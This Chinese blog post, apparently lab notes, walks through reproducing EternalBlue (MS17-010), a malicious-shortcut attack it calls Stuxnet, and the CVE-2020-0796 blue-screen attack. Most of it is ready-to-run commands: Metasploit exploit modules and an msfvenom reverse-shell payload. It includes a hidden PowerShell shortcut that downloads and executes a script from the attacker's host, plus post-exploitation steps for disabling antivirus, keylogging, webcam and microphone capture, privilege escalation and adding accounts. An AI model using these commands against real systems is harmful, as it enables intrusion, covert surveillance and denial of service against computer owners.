永恒之蓝和震网病毒复现

最新推荐文章于 2024-02-21 17:57:55 发布
最新推荐文章于 2024-02-21 17:57:55 发布
阅读量479 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BRMTSW/article/details/129286340
版权

永恒之蓝

1、打开msf

 

2、漏洞编码查找

search ms17_010

使用:use auxiliary/scanner/smb/smb_ms17_010

靶机探测:set rhosts 192.168.3.0/24

run

 

绿色+号表示有可能存在该漏洞

3、攻击利用

search ms17_010

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.1.8

再次查看编辑信息:options

4、run进行攻击

如果出现meterperter即攻击成功

 此处为攻击失败页面

后渗透利用

查看进程:ps

查看当前进程号:getpid

查看系统信息:sysinfo

查看目标机是否为虚拟机:run post/windows/gather/checkvm

查看完整网络设置:route

查看当前权限:getuid

自动提权:getsystem

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

抓取摄像头的照片:webcam_snap

查看当前处于目标机的那个目录:pwd

查看当前目录:getlwd

键盘记录:keyscan_start keyscan_dump

绕过UAC提权:use exploit/windows/local/ask

创建用户:run getgui -u msb -p 123456

安卓机录音渗透:

record_mic 包含4个可选参数 分别为 -d 是设置录音时长的 -f 设置未见路径的 -h 查看帮助的 -p 控制自动播放的 一条简单的录音语句 record_mic -d 10 -p true

Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)

原理解释:

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序

震网病毒

1、开启msf和靶机

 

 

2、创建后门

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.23 (攻击机ip)lport=4456 -f psh-reflection>/var/www/html/link.ps1

 

3、启动appach2

4、靶机创建快捷方式

右键、创建、快捷方式

输入:powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.204.135/link.ps1‘);test.ps1″

注意:一定要和创建的后门的名字一样

5、攻击机配置监控

use exploit/multi/handler

6、攻击机配置payload后输入run回车

set payload windows/x64/meterpreter/reverse_tcp(和后面配置一致)

7、靶机执行shell

8、meterpreter出现,攻击成功!!!!!

攻击原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远控。

永恒之黑蓝屏攻击

永恒之黑漏洞与“永恒之蓝”漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限

由于没有合适靶机,暂无实验

支持版本

Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)

1、漏洞探测

直接在cmd中启动 CVE-2020-0796-Scanner.exe(一个py工具包)

2、找到攻击靶机ip

使用CVE-2020-0796 蓝屏工具进行攻击

python3 CVE-2020-0796.py <查询到存在漏洞的IP>

回车即可进行攻击

最后附上前两个支持Windows版本

永恒之蓝:

Windows server 2008R2、Windows 7

震网:

1 可复现的操作系统版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

2 可复现的服务器系统版本:

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

 

BRMTSW
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WooyunDrops, Wooyun知识库,乌云知识库,https.zip
09-17
WooyunDrops, Wooyun知识库,乌云知识库,https Wooyun丢弃演示:https://wooyun.kieran.top静态版乌云丢弃选项:2.图片依赖于 https://github.com/SuperKieran/wooyun-img
勒索病毒“WannaCry”之复现过程(永恒之蓝
weixin_40950781的博客
08-09 6230
勒索病毒“WannaCry”复现永恒之蓝)1.漏洞简述2.漏洞复现2.1复现环境2.3复现过程2.3.3 开始攻击3.结语4.防范 1.漏洞简述 “永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等...
永恒之黑和永恒之蓝 漏洞解析及复现
最新发布
黑战士的博客
02-21 1349
充当攻击机的机器是kali,另外需要关闭防火墙策略。
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
06-24
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
零日漏洞:震网病毒全揭秘
02-13
零日漏洞:震网病毒全揭秘零日漏洞:震网病毒全揭秘
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透基础+永恒之蓝复现 漏洞挖掘 win7 ms17-010
stuxnet(震网)的详细分析
06-12
stuxnet(震网)的详细分析文档,详细分析了stuxnet的每个阶段。
【漏洞复现永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 7761
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
永恒之蓝CVE-2017-0146)复现(超详细)
轻舟已过万重山
09-21 2095
大家好,这是我来到CSDN创作的第二篇博客,我在进行实战模拟时跟大家一样,找到的教程,资料都是参差不齐,要么文章含金量不高,要么不详细,跳过了很多步骤,导致我们在实战复现的过程中,遭遇了各种各样的阻碍,但是我们在搜索相关报错信息时又找不到资料,整个安全圈的技术属于只对圈内开放,难住了很多想要入门的小伙伴,所以在此之后,我会将我自己的学习路线和每次实战的思路,以及遇到的问题,都写成博客,希望能够帮到大家,也希望有大神来指导指导我,大家一起共同进步。
漏洞复现_CVE-2017-0144 “永恒之蓝”漏洞
qq_51550750的博客
06-02 2900
漏洞复现_CVE-2017-0144“永恒之蓝”漏洞
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 3757
ms17-010,永恒之蓝漏洞复现
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
wwwwyyyrre的博客
04-22 2223
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
永恒之蓝_CVE-2017-0143_漏洞复现/验证
18年开始,学2.5年编程(C、JAVA),学2.5年网络(RS、WLAN),现在来到2023年,转行网络安全。
03-06 1209
永恒之蓝CVE-2017-0143,漏洞验证/复现
永恒之蓝漏洞复现CVE-2017-0146)
qq_58000413的博客
04-03 4601
前言 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 原理分析: 利用ms17-010中的扫描模块和攻击模块进行,首先通过扫描模块判断是否存在永恒之蓝漏洞
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞的复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值